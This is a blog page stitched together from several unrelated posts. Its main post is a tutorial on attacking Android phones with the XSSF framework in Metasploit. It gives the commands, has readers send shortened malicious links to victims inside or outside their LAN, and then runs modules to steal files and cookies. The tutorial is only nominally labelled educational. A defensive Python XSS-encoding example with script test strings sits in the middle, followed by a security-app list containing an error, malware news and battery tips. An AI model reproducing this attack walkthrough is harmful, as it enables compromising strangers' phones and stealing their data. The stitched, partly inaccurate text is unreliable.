Penetration Testing – Cross Site Scripting on android device using Kali Linux

Hello Guyzz!! :D
Today we will learn how to pen test Cross Site Scripting on an Android device and how a hacker can exploit an Android phone using XSSF (the Cross-Site Scripting Framework) from Kali Linux.

What is Cross Site Scripting?

Cross site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side script into web pages viewed by other users; the injected script then runs in the victim's browser with the trust of the vulnerable page's origin. A cross site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy.
Note: This is only for educational purposes!!
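To make the definition above concrete from the defender's side, here is an added Python example (not part of the original tutorial, and not XSSF code) that contrasts a page which concatenates untrusted input straight into HTML with one that entity-encodes it, and adds the URL-scheme check that entity encoding alone does not give you. The sample comment and link are constructed test strings; the function names and the Content-Security-Policy value are my own choices, not anything the tutorial prescribes.

```python
import html
from urllib.parse import urlsplit

# Constructed sample inputs: a comment carrying a script tag and a link that
# smuggles script through the URL scheme. Both are classic XSS test strings.
UNTRUSTED_COMMENT = '<script>alert(1)</script>'
UNTRUSTED_HREF = 'javascript:alert(1)'


def render_comment_vulnerable(comment: str) -> str:
    """Vulnerable: untrusted text is concatenated straight into the HTML body,
    so a <script> tag in the comment becomes part of the page."""
    return "<p>" + comment + "</p>"


def render_comment_hardened(comment: str) -> str:
    """Hardened: entity-encode the untrusted text for the HTML body context.
    quote=True also encodes quotes, so the same helper is safe in attributes."""
    return "<p>" + html.escape(comment, quote=True) + "</p>"


def safe_href(url: str) -> str:
    """URL context: entity encoding does not stop javascript: links, so the
    scheme must be allow-listed. Relative URLs (empty scheme) are allowed."""
    scheme = urlsplit(url).scheme.lower()
    if scheme in ("", "http", "https"):
        return url
    return "#"


def render_link_hardened(url: str, text: str) -> str:
    """Apply both the scheme check and attribute-context encoding."""
    return '<a href="%s">%s</a>' % (
        html.escape(safe_href(url), quote=True),
        html.escape(text, quote=True),
    )


def contains_script(markup: str) -> bool:
    """Naive check used only to show that the hardened output carries no
    executable script; it is a demonstration aid, not a sanitizer."""
    lowered = markup.lower()
    return "<script" in lowered or "javascript:" in lowered


def csp_header() -> dict:
    """Defence in depth: a Content-Security-Policy that refuses inline script,
    so an encoding slip elsewhere in the page still does not run injected code."""
    return {"Content-Security-Policy": "default-src 'self'; script-src 'self'"}


if __name__ == "__main__":
    print("vulnerable:", render_comment_vulnerable(UNTRUSTED_COMMENT))
    print("hardened:  ", render_comment_hardened(UNTRUSTED_COMMENT))
    print("link:      ", render_link_hardened(UNTRUSTED_HREF, "click"))
```

The point of the two link helpers is that encoding is context-dependent: `html.escape` is the right tool for the HTML body and for attribute values, but a `javascript:` URL survives it untouched, which is why the scheme allow-list is a separate step. The CSP header is the backstop for whatever encoding the page gets wrong.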

Requirements to perform XSSF:

1. Kali Linux installed on your machine
2. Cross-Site Scripting Framework tool (you can find it here: https://code.google.com/p/xssf/ )
3. Metasploit Framework, which comes pre-installed in Kali
4. An Android phone to run the exploits against

OK, then let's get started…

Step 1: Open the terminal and navigate to /usr/share/metasploit-framework using the command below:
cd /usr/share/metasploit-framework
Step 2: Now install the XSSF framework tool using the following command inside the Metasploit directory:
svn export http://xssf.googlecode.com/svn/trunk/ XSSF
(Screenshot of the above step: install)
The XSSF tool already exists on my machine…
Step 3: Navigate to Applications > Kali Linux > System Services > Metasploit and click on community / pro start.
Also restart MySQL: Applications > Kali Linux > System Services > MySQL > mysql restart

Now open a new terminal and type msfconsole.
Step 4: Now load the XSSF framework on a specified port using the following command:
load xssf Port=80 Uri=/xssf/ Public=true Mode=Verbose
Here, I am using port 80.
Now, to list the URLs that have to be sent to the victims, use the following command:
xssf_urls
Here is the screenshot of all the above: (load_and_urls)
If you want to exploit a device that is on your LAN, you should send this URL to the victim:
http://<your lan ip>:80/xssf/test.html
Or, if you want to exploit a device outside your LAN, you should send this URL to the victim:
http://<PUBLIC-IP>:80/xssf/test.html
Here, PUBLIC-IP refers to your external IP.
Use any online IP address service, like whatsmyipaddress, to find out your IP.
To exploit a device outside your LAN you need to forward whichever port you use; for example, if I wanted to exploit a device outside my LAN I would have to forward port 80.
To learn how to do port forwarding visit this link: Port Forwarding
OK, now we will continue with exploiting a device in the LAN.

Step 5:
Shorten your URL using an online URL shortener and then send it to the victim so that he/she just clicks on it.
When the victim clicks on the URL, he/she is said to be exploited.
Here is the screenshot of the victim: (Victim Machine)

Step 6:
The information about the victim can be viewed by opening the main log page, here:
http://<your lan ip>:80/xssf/gui.html?guipage=main
The attacker should use this page, even when exploiting a device outside the LAN, to gather information about the victim.
A sample screenshot of the log page is given below: (victim)

Step 7:
Now that the victim is exploited, we can use the auxiliaries to steal files from the device, steal the cookies, send alert messages, etc…

Here we will send an alert message to the victim saying that it's an XSSF Attack!!

First, search for the auxiliary you want to use with the following command:
search auxiliary/xssf
Here is the screenshot of the auxiliaries: (auxiliary)
I will be using the auxiliary highlighted in the screenshot to send the alert message to the victim.
The auxiliary can be used as follows:
use auxiliary/xssf/public/misc/alert [hit enter]
Now type: show options [hit enter]
You can set the alert message you want using the set AlertMessage command.
Here is the screenshot: (use_n_show_options)

To run the auxiliary just type run and hit enter.
The victim will be shown the alert message on his screen, as shown: (XSSF Alert)

The log page will also be updated with the types of auxiliaries you run on the victim's device, as shown below: (launched_auxiliars)
Note: If you use an auxiliary that can steal files from the victim's device, the file can be downloaded from the above log page when the exploit succeeds!!

So try this stuff and enjoy!!
Have a good day!!

Tutorial by: Kartik Durg
Thank you.. ;)

Top 7 Android Security Apps

If you are an active internet/web user, you must be aware of the potential dangers that lurk online, including harmful malware, viruses, Trojans, spyware bots, etc. These threats expose your personal data to hackers (unwanted users) and put your privacy at risk. To avoid these risks, it's necessary to use good security apps that can protect you from all of the above-mentioned threats and potential dangers.
These security apps allow users to protect themselves not only from harmful online threats but also from physical ones, like a phone being misplaced or stolen. So ... lists the top Android security apps for Android phones.
Top 7 Android Security Apps Ever

    1. Lookout Security & Anti-Virus

    Lookout Security & Anti-virus app for Android is an application that secures Android users from threats such as bugs, Trojans, and viruses that may enter the device through local networks or online. Lookout Security & Anti-virus allows users to protect their vital data and find their phone if they misplace it, and backup their important files and documents in a safer place.
    Use the Lookout Security & Anti-virus app to scan every individual app you download to make sure the apps are safe from malware, spyware and Trojans. A great feature found in the application is the “Routine Check” that allows users to schedule daily or weekly scans of the apps you download. You can also get automatic, over-the-air protection against the latest threats.

    2. AVG Antivirus

AVG Antivirus is the Android-based version of the renowned antivirus software for personal computers of the same name. The AVG Antivirus app allows users to scan apps, settings, files and the media card in real time, allowing you to find any threats in any of them that may put your privacy and vital information at risk of being exposed. Not only applications: the AVG Antivirus application for Android also allows users to screen incoming SMS to detect any harmful threats.
AVG Antivirus also ensures the maximum speed of your phone by giving users a task manager to kill off any apps and tasks that slow the device down.

    3. McAfee WaveSecure

    McAfee WaveSecure is an award winning mobile protection app for your Android devices and systems. McAfee WaveSecure gives users the option to secure their personal data on their mobile device, in the event that the mobile may be lost or stolen. In such a case, McAfee WaveSecure can be used to track your device and even wipe all data on the Android device, saving it from any prying eyes. An easy-to-use web portal allows users to backup and restore their personal data.

    4. Norton Antivirus & Security

Norton Antivirus & Security is a security application for Android devices with iOS 2.1 and up. Norton Antivirus & Security allows users to protect their devices from loss of data in case of theft and malware attacks. It is backed by Norton, one of the best antivirus companies in the world. Norton Antivirus & Security provides all the features an Android user needs to keep themselves safe and secure from malware, Trojans, spyware and other incidents such as theft. The antivirus protection automatically scans downloaded apps and app updates for any potentially harmful threats. It also searches for and removes mobile security threats that may tamper with your phone in order to obtain your personal information. Norton Antivirus & Security allows users to scan the SD card for any harmful threats. It also allows users to lock their devices and remotely wipe any confidential data found on the device if it is misplaced or stolen.

    5. Mobile Security & Antivirus

Mobile Security & Antivirus provides users with two basic functions that keep vital information safe and secure from all kinds of threats: antivirus protection and security. Mobile Security & Antivirus keeps your Android device free from viruses and saves battery life, an essential, helpful feature when you need battery life and have only a little left. Use Mobile Security & Antivirus's malware scanner to scan apps as you download them and check for any harmful threats that may put your privacy at risk, including confidential data such as passwords and emails.
One of the best features present in Mobile Security & Antivirus is the "Application Audit" feature, which can be used to ensure that apps do not take more permissions than they should, and thus lets you safeguard your private data and even control unwanted Internet updates.

    6. Avast! Mobile Security

Avast! Mobile Security provides Android users with OS 2.1 and up with protection from viruses and theft-related security issues. Use Avast! Mobile Security to protect private data with automatic virus scans and to find infected URLs before they infect your mobile with malware and spyware. Use the SMS commands to wipe, lock and GPS-track your Android device in case it is stolen or misplaced somewhere outside your home. You can also use the "Activate Siren" feature to turn on a loud siren, allowing you to locate your mobile phone, a helpful feature if the phone is misplaced somewhere inside your home.
The Avast! Mobile Security application also allows users to screen incoming SMS and phone calls. Use parameters to direct specific unwanted calls to voicemail.

    7. NQ Mobile Security & Antivirus

NQ Mobile Security & Antivirus is a total mobile security solution for Android devices, protecting them from harmful threats such as malware, spyware and Trojans while also allowing users to monitor their devices to ensure maximum speeds. Use the NQ Mobile Security & Antivirus app to browse the internet safely without having to worry about phishing, fraud sites and malware that lurk on the internet. The app is updated regularly, keeping track of all the latest viruses and threats discovered.
Use the Network Manager to track your traffic consumption over a period of 30 days and keep up with the trend and statistics as well. Use the Backup & Restore feature present in the NQ Mobile Security & Antivirus app to back up and retrieve contacts and messages found on any of your mobile devices: iOS, Android, Blackberry or Nokia.
    Let me know if we missed one!
New Android Malware Detected by Sophos

It's very rare to hear about an instance when Android malware is detected, but recently a Chinese hacker tried to hack Android using a game named "The Roar of the Pharaoh." The bug was spotted by the security (penetration testing) team from Sophos, a well-known security firm. The game does not show any security or permission issues when the user installs it, so Android users believe that it is reliable, non-malicious software that will not harm their system. Please avoid Android games and applications from unknown publishers, as they may result in a critical information leak and sometimes in an OS crash.
The game actually collects all the sensitive and personal information from the device (like a normal Trojan) and sends it to the author via premium-rate SMS, without getting the user's permission. The Trojan sends information like phonebook entries, SMS, IMEI number, phone number, OS version, etc. Though no cases of illegal usage of the users' information have been reported yet, researchers believe that more damage can be done using this bug.
According to the vendor, the malware runs as a service called "GameUpdaterService," which sounds like a legitimate name for an application and makes the user think that a game is updating; this is just another example of the social engineering element of a campaign that makes it look like a reliable application, next to the actual brand-jacking of a legitimate game's name.
The application has been detected as Stinter-A; the mobile phone companies process the money to the authors before the application user gets the bill. Michael Sutton, Vice President of security research at cloud-based security provider Zscaler, said the fake "The Roar of the Pharaoh" app for Android reflects a shift of malware authors towards targeting the Android platform, whether through smartphones or tablets. Fake game apps that are really Trojans are increasing and "this is a typical scam for Android now," he added.
The interests of hackers have now shifted from computers to Android phones. Android officials have not released a statement about this application, but have warned users to beware of such malicious applications.
The authors have not yet been caught, and Chinese security is still working to put them behind bars.
Maximize or boost android phone battery life

Android phones are powerful, useful, cool and very interesting devices that get you addicted to the phone. Most Android smartphone users have one big issue: "battery backup". You don't need to change the device because the battery drains quickly; instead, we will give you tips on how to improve the battery life of your Android smartphone.
Instructions:
1. Use Android's built-in battery usage screen: Check what exactly is eating up your Android phone's battery the most. Go to Settings > About Phone > Battery Use. From this screen you can understand what to turn off in your phone settings to save battery.
2. Adjust the brightness: Big bright screens are great to look at but they eat up the maximum amount of your Android's battery. To adjust the brightness go to Settings > Display > Brightness. You can either select the auto brightness option, if available, or adjust it manually.
3. Disable Wi-Fi: We know browsing on Wi-Fi is much faster than browsing on a mobile data plan. Make sure you turn off Wi-Fi when you aren't using it, because if Wi-Fi is on your phone will keep scanning for available networks. Go to Settings > Wireless and network settings > Wifi settings > Turn Off Wifi. (Or simply turn off Wi-Fi from the notification area.)
4. Disable Bluetooth: Disable Bluetooth whenever you are not using it. It saves a lot of battery and keeps your smartphone safe too. Go to Settings > Wireless and network settings > Bluetooth settings > Turn off Bluetooth. (Or simply turn off Bluetooth from the notification area.)
5. Disable GPS: Disable GPS and Latitude when you are not using them. GPS is a very powerful service but it drains the battery pretty fast. Use GPS only when you need it. Go to Settings > Location and Security Settings > Remove the check from "Use GPS Satellites". (Or simply turn off GPS from the notification area.)
Note: You can use the "Power Widget" to easily toggle GPS, Bluetooth, Wi-Fi and screen brightness.
6. Disable automatic sync: Many applications like Gmail, Facebook, Twitter and other email apps eat up a lot of battery due to automatic sync features. Background data is also required to get e-mails and updates at regular intervals. The best setting you can choose is to keep background data on and the automatic sync feature turned off. Go to Settings > Accounts and Sync > Remove the check mark from "Auto-sync".
7. Disable or remove the apps that you don't use: There are many apps which we have installed and never use. Make sure you remove such apps, because many of them keep running in the background. This will help you free up internal phone memory as well as save battery.
8. Disable home screen widgets and live wallpaper: Home screen widgets keep their apps running in the background, so make sure you keep only those widgets that you generally use. Live wallpaper is surely eye candy and makes your smartphone home screen look beautiful, but it halves the battery backup you would normally get with an image as wallpaper. So don't use live wallpaper, and use a minimum of widgets.
9. Use a good task killer: I would suggest using the inbuilt Task Killer app of your Android smartphone, because it has been designed for your phone. If you want, you can also grab a good task killer from the Android Market; make sure you use it according to the instructions given. If used properly, task killers can do wonders for your smartphone.
10. Use battery saving apps: There are many applications that aim to improve your battery performance. The majority of these restrict internet use and can be customized according to your needs. One of the best apps for this purpose is "Juice Defender", available in both paid and free versions in the Android Market. "Juice Defender" lets you configure a bunch of parameters to govern your phone's power usage. You could set Android to automatically switch off data services during the night, for example, or to only enable synchronization when your screen is actually on.
Different versions of Android have different levels of battery performance. Generally, with each new version of Android, battery life has improved. The latest version of Android, Gingerbread 2.3, has good battery backup in comparison with the older versions.
Source: Enzag
